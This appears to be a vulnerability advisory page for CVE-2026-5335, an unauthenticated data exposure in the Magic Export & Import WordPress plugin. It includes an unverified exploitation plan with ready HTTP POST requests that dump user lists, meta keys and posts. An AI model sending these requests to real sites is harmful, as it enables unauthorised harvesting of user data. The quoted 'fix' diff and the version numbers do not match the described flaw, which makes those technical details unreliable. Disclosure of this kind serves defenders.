CVE-2026-5335

Magic Export & Import <= 1.1.0 - Unauthenticated Information Exposure

mediumExposure of Sensitive Information to an Unauthorized Actor
5.3
CVSS Score
5.3
CVSS Score
medium
Severity
1.2.0
Patched in
30d
Time to patch

Description

The Magic Export & Import plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.1.0. This makes it possible for unauthenticated attackers to extract sensitive user or configuration data.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
Low
Confidentiality
None
Integrity
None
Availability

Technical Details

Affected versions<=1.1.0
PublishedApril 13, 2026
Last updatedMay 12, 2026
Affected pluginmagic-export-import

What Changed in the Fix

Changes introduced in v1.2.0

Loading patch diff...

Source Code

WordPress.org SVN
Research Plan
Unverified

# Exploitation Research Plan - CVE-2026-5335 ## 1. Vulnerability Summary The **Magic Export & Import** plugin (<= 1.1.0) is vulnerable to **Unauthenticated Information Exposure**. The vulnerability exists because the plugin registers several AJAX handlers intended for administrative export/import f…

Show full research plan

Exploitation Research Plan - CVE-2026-5335

1. Vulnerability Summary

The Magic Export & Import plugin (<= 1.1.0) is vulnerable to Unauthenticated Information Exposure. The vulnerability exists because the plugin registers several AJAX handlers intended for administrative export/import functionality via wp_ajax_nopriv_ (unauthenticated) hooks without implementing sufficient capability checks or nonce verification. This allows an unauthenticated attacker to invoke these handlers and retrieve sensitive data, including user lists, meta keys, and potentially WooCommerce order details or configuration settings.

2. Attack Vector Analysis

  • Endpoint: /wp-admin/admin-ajax.php
  • Vulnerable Actions:
    • get_individual_export_users (Identified via assets/magic-export-import.js)
    • get_individual_export_shop_orders (WooCommerce data)
    • get_individual_export_posts (Private/Draft posts)
    • refresh_export_users_keys (Meta key enumeration)
  • HTTP Method: POST
  • Authentication: None Required (nopriv).
  • Preconditions: The plugin must be active. For user data exposure, the users export type must be initialized (standard).

3. Code Flow

  1. Entry Point: An unauthenticated request is sent to admin-ajax.php with the action parameter set to a dynamic string like get_individual_export_users.
  2. Hook Registration: The plugin (specifically in includes/magic-types/class-magic-ex-im-type-users.php, inferred from the setup loader) registers this action to a handler.
  3. Vulnerable Handler: The handler likely calls get_individual_export_items($args) as defined in the abstract Magic_EX_IM_Type class (includes/class-magic-ex-im-type.php).
  4. Data Retrieval: The users implementation of this method performs a user query (e.g., get_users() or $wpdb query) based on the q (query) parameter provided in the request.
  5. Sink: The retrieved data (usernames, IDs, etc.) is returned as a JSON object to the requester.

4. Nonce Acquisition Strategy

Analysis of assets/magic-export-import.js (lines 78-98) shows that the select2 AJAX configuration for individual item exports does not include a nonce parameter:

// From assets/magic-export-import.js
ajax: {
    type: 'POST',
    url: WPLocalize.admin_ajax_url,
    delay: 400,
    dataType: 'json',
    data: function (params) {
        params.action = `get_individual_export_${WPLocalize.magic_type}` // e.g., get_individual_export_users
        params.magic_item = WPLocalize.magic_item // e.g., users
        return params; // No nonce included here
    },
},

Because the plugin intended this for unauthenticated access (as indicated by the "Unauthenticated" classification and the absence of nonces in the JS), no nonce is required to trigger the information exposure.

5. Exploitation Strategy

Target: User Information Exposure

This exploit attempts to leak the site's user list (IDs, login names, and display names).

  • HTTP Request:
    POST /wp-admin/admin-ajax.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    
    action=get_individual_export_users&magic_item=users&q=
    
  • Payload Parameters:
    • action: get_individual_export_users
    • magic_item: users
    • q: An empty string (to match all users) or a wildcard.
  • Expected Response: A JSON object containing an array of user objects.
    {
      "results": [
        {"id": 1, "text": "admin <code>1<\/code>"},
        {"id": 2, "text": "target_user <code>2<\/code>"}
      ]
    }
    

Alternative Target: Meta Key / Configuration Exposure

This exploit attempts to leak the available meta keys in the database.

  • HTTP Request:
    POST /wp-admin/admin-ajax.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    
    action=refresh_export_users_keys&magic_item=users
    
  • Expected Response: JSON containing export_keys_html which reveals meta keys used in the wp_usermeta table.

6. Test Data Setup

Before running the exploit, ensure the environment has identifiable data:

  1. Create Users:
    • wp user create victim_one victim1@example.com --role=editor
    • wp user create victim_two victim2@example.com --role=author
  2. Plugin Setup: Ensure the Magic Export & Import plugin (v1.1.0) is activated.
    • wp plugin activate magic-export-import

7. Expected Results

  • The request to get_individual_export_users returns a HTTP 200 OK.
  • The body contains a JSON object listing the created users (victim_one, victim_two, and the admin).
  • No authentication cookies or headers are required in the request.

8. Verification Steps

  1. Compare Data: Run wp user list --fields=ID,user_login and verify the output matches the IDs and names leaked in the AJAX response.
  2. Check Capability Enforcement: Attempt the same request on a patched version (1.2.0) and verify it returns 0 or a 403 Forbidden error.

9. Alternative Approaches

If the users type is restricted or disabled, attempt to leak other sensitive items:

  • Comments: action=get_individual_export_comments&magic_item=comments&q=
  • ACF Options: action=get_individual_export_acf_options_pages&magic_item=acf_options_pages&q=
  • Posts (including Drafts): action=get_individual_export_posts&magic_item=post&q= (where magic_item is the post type slug).
Research Findings
Static analysis — not yet PoC-verified

Summary

The Magic Export & Import plugin for WordPress is vulnerable to unauthenticated information exposure due to the registration of several AJAX handlers via 'wp_ajax_nopriv_' hooks without capability checks or nonce verification. This allows unauthenticated attackers to query and retrieve sensitive data, including user lists, meta keys, and WooCommerce order details, by directly hitting the admin-ajax.php endpoint.

Vulnerable Code

// assets/magic-export-import.js lines 78-98 (v1.1.6)
this.$exportItemsSelect.select2({
    placeholder: 'Select items to export',
    minimumInputLength: 0,
    closeOnSelect: false,
    width: '100%',
    escapeMarkup: (markup) => {
        return markup
    },
    templateSelection: (tag, container) => {
        return tag.text.split('<code>')[0]
    },
    ajax: {
        type: 'POST', // AJAX request lacking nonce or session validation
        url: WPLocalize.admin_ajax_url,
        delay: 400,
        dataType: 'json',
        data: function (params) {
            params.action = `get_individual_export_${WPLocalize.magic_type}`
            params.magic_item = WPLocalize.magic_item
            return params
        },
    },
})

Security Fix

diff -ru magic-export-import/1.1.6/assets/magic-export-import.js magic-export-import/1.2.0/assets/magic-export-import.js
--- magic-export-import/1.1.6/assets/magic-export-import.js	2025-11-11 09:44:56.000000000 +0000
+++ magic-export-import/1.2.0/assets/magic-export-import.js	2026-04-02 07:44:14.000000000 +0000
@@ -32,23 +32,6 @@
                 this.$exFiltersTogglerCheckbox.closest('.form-field').remove()
             }
 
-            let $exportFileLink = $('#magic-ex-generated-file')
-
-            // Download newly generated export file if exists, compatible with Safari.
-            if ($exportFileLink.length) {
-                setTimeout(() => {
-                    let fileURL = $exportFileLink.attr('href'),
-                        link = document.createElement('a')
-
-                    link.href = fileURL
-                    link.download = ''
-
-                    document.body.appendChild(link)
-                    link.click()
-                    document.body.removeChild(link)
-                }, 500)
-            }
-
             // Init magic item select.
             this.$magicItemSelect.select2({

Exploit Outline

An unauthenticated attacker can exploit this vulnerability by sending a POST request to the WordPress AJAX endpoint (/wp-admin/admin-ajax.php) targeting actions registered with the 'nopriv' prefix, such as 'get_individual_export_users'. By providing parameters like 'magic_item=users' and an empty search query 'q=', the attacker can trigger a server-side query that returns a JSON list of all registered users (including IDs and login names). No authentication or nonce is required because the plugin fails to implement 'current_user_can()' or 'check_ajax_referer()' in the corresponding PHP handlers.

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.